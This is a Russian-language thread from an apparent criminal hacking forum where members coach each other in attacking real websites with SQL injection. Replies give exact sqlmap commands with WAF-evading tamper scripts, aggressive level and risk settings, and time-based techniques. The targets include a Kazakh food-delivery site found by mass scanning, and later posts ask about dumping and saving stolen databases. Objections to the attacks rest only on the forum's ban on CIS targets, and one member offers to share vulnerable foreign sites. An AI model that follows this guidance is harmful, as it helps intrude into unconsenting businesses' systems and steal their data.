• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Desoxyn


Я понимаю что по снг работать это моветон, но я только учусь. Одну бд смогу раскрыть, эту нет, прочитав мануалы так же пытался сам ковырятся. На счёт формы я тупанул, перепутал с пост запросом.

Со звездочкой так же закидывал в мап

Сохр. файл так:
1675511296347.png
Надеюсб я правильно сделал.
С файлом, я пытался sqlmap -r /home/kaliuser/Desktop/fixxxx --dbs --tables --random-agent --tamper=space2comment запросы был составлен таким образом.
дальше пошло это:
1675511104885.png

В итоге:
1675511526651.png

Он не видет динамический параметр
[04:01:01] [WARNING] URI parameter '#1*' does not appear to be dynamic

WAFW00F:
[+] Generic Detection results:

[*] The site https://site.com/akcii/archive/podarochki? seems to be behind a WAF or some sort of security solution

[~] Reason: The server returns a different response code when an attack string is used.

Normal response code is "200", while the response code to cross-site scripting attack is "403"

[~] Number of requests: 5





Заранее извинясь что туплю.
 
Последнее редактирование:
Ты тупишь пиздeц. Еще и в глаза долбишься. Я тебе 3 сцук раза указал на это место. 3. ТРИ!
Ты сканируешь параметр 193259662%20or%209387%3d09387=1* а надо хотя бы 1*

Короче, после того, как в берпе нажал save item и сохранил файл, открой этот файл.
В строке GET /akcii/archive/podarki?193259662%20or%209387%3d09387=1 - удали 3259662%20or%209387%3d09387=1 чтобы она стала такой

GET /akcii/archive/podarki?19* HTTP/2

остальное не трогай! Файл сохрани.
Теперь в мапе:

sqlmap -r /home/kaliuser/Desktop/fixxxx --force-ssl --level=4 --risk=3 --dbms=mysql -o -v 3 --random-agent --batch --fresh-queries --tamper="space2comment,randomcase,modsecurityversioned"
больше ничего не пиши. Запускай и жди. Если ничего не вылезло, --dbms=mysql убери. Тамперы можешь вообще не использовать, если в sqlmap 403 ошибки не возникает. Ты даже в WAFW00F линк криво засунул :D

Если отдает 403 ошибку и дальше, только подбирать тамперы. Но не сканировать сам пэйлоад 193259662%20or%209387%3d09387 , эт пздц
[08:00:18] [WARNING] URI parameter '#1*' does not seem to be injectable

[08:00:18] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')

[08:00:18] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 898 times

[08:00:18] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
1675526988376.png
 
Последнее редактирование:

Lofia

Нахера ломать суши Актау? 0_o Голоден? Я не помошник, ладно бы дельное что то было. А то это даже не практиковаться на портсвиггере, где тебе сука целые лабы предоставлены, а целенаправленно пацанам гадить. Досвидос. Таких как ты считаю крысой. Вам не место в пентесте.
Причём тут голоден:/ я набрал сайты по поиску в publicwww, просканил, нашёл уязвимости, решил попробывать что-то сделать с ними. Если дельное предложи. Мне сразу на гос сайты переходить?
 
Последнее редактирование:
Lofia работать по СНГ это не просто моветон, это запрещено правилами этого форума. Жди бана.
Чувак, я не работаю по снг, а смотрю уязвимости сайтов. Ладно бы если я сливал что-то, тут я просто тренеруюсь на чём-то.
 
Чувак, я не работаю по снг, а смотрю уязвимости сайтов. Ладно бы если я сливал что-то, тут я просто тренеруюсь на чём-то.
Это уже пусть admin решает.
 
Для тренировок есть куча лаб. Ты портишь (точнее пытаешься, с твоими то скиллами, клоун :D) бизнес людям из СНГ. Пацаны суетились, влезали в долги (возможно),в любом случае зарабатывают руками, чтобы тебе пожрать королю бл#ть доставить. Казахстан мне братики. А ты даже головой заработать не можешь. Это не амеров крутить, у которых на счету 200 битков, а он еще пособие получает, как безработный. На подобных срать. Ты же срешь, там где живешь. Ты крысеныш, мелкий и подлый. Минус и желательно бан
я на этих лаб попробывал гений, я одну уже дыру помог залатать, ты даже не знаешь чем я занимаюсь, уже языком что-то пытаешься высрать. Я в одной компании нашёл эту инъекцию, потом написал к ним соцсети, скинул php с исправлением этого дела.Причём тут еда? я тебе ещё раз повторяюсь, зашел на сайт publicwww нашёл по теми данными сайты и закинул в бурп.Мне смысла нет по СНГ работать и сливать данные людей, портить им работу, я не настолько суицидник.
 
Последнее редактирование:
Чувак, я не работаю по снг, а смотрю уязвимости сайтов. Ладно бы если я сливал что-то, тут я просто тренеруюсь на чём-то.
Есть дохуя сайтов за пределами СНГ как дуршлаг дырявых где ты можешь потренироваться если уж лабы тебе не заходят, стукни в личку - скину тебе, зачем СНГ трогать.
 
Есть дохуя сайтов за пределами СНГ как дуршлаг дырявых где ты можешь потренироваться если уж лабы тебе не заходят, стукни в личку - скину тебе, зачем СНГ трогать.
Вы вообще не видите что я пишу? Я помогаю челам в их уязвимостях, так себе хотя бы опыт нагоняю, я не пытаюсь как-то им испортить жизнь.
 
Чем ТЫ можешь помочь? Ты не знаешь как взломать


Мммм? :D Иди уроки учи. Мамка наругает.
Понятно что чел немного заврался что он помогать собрался и тп, но мне кажется ты слишком жетко с ним 😄
 
Чем ТЫ можешь помочь? Ты не знаешь как взломать


Мммм? :D Иди уроки учи. Мамка наругает.
Чувак, дефолт php с проверкой наверн не каждый сможет согласен. Первый который я смог ломануть была с MariaDB там типкл проверки не было.
 
* просто не понимает что не просто так ввели правило не работать по снг а потому что те кто работает по ру к тому приходят по утру... * просто не понимает что он может сесть. Что это просто напросто опасно. И помогаешь ты кому то или нет уже дело десятое.
 
Последнее редактирование модератором:
Дурачёк просто не понимает что не просто так ввели правило не работать по снг а потому что те кто работает по ру к тому приходят по утру... дурачёк просто не понимает что он может сесть. Что это просто напросто опасно. И помогаешь ты кому то или нет уже дело десятое.
Клоун который накручивает сообщения и реп тем что языком онли болтает и не читает ситуацию? Подлизываться твоё второе имя)
 
Причём тут голоден:/ я набрал сайты по поиску в publicwww, просканил, нашёл уязвимости, решил попробывать что-то сделать с ними. Если дельное предложи. Мне сразу на гос сайты переходить?
Не слушай никого. Делай, что считаешь нужным. Развивайся. читай, практикуйся, но на свой страх и риск конечно же. Если, что мы тут все против незаконных действий)
 
Вопрос по sqlmap и sql injection.
Скан показал немало sql инъекций. Пытался раскрутить через sqlmap, каждый раз показывает разную БД. Всегда находит слепую инъекцию разных параметров, но потом выдает, что ложноположительно. Смотрел с -v 5. Никак не отфилтровывает, код 200 везде. Имеет ли смысл пытаться подобрать тампер или нет никакой уязвимости?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Дампил большую БД, сгорел блок питания на ноуте, пока он горел я успел завершить процесс в sqlmap, но ничего в логах не сохранилось, ни одно название таблицы нужной мне бд. Подскажите как сохранять даже не докрученные бд
 
Скрытое содержимое
У тебя ошибки, разбор которых есть здесь: https://xss.pro/threads/69783/post-492045
Пробуй сам искать и исправлять, если не разберешься сам, то помогу. Могу только по тамперам подсказать: space2comment и randomcase. Остальное по ссылке выше. Инъкция крутится, только очень медленно, так как тайм-базед. Имя только одной БД information_schema дампило 800 секунд (13 минут), имя второй БД community (их там две всего) дампило 402 секунды (6 минут). Теперь представь сколько займет дамп имен таблиц и колонок, и хоть какой-то инфы из них.

Команда мапу такая:
Код:
sqlmap.py -r "/etc/request.txt" --dbs --technique=T --tamper=randomcase,space2comment --risk=3 --level=5 -v3
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх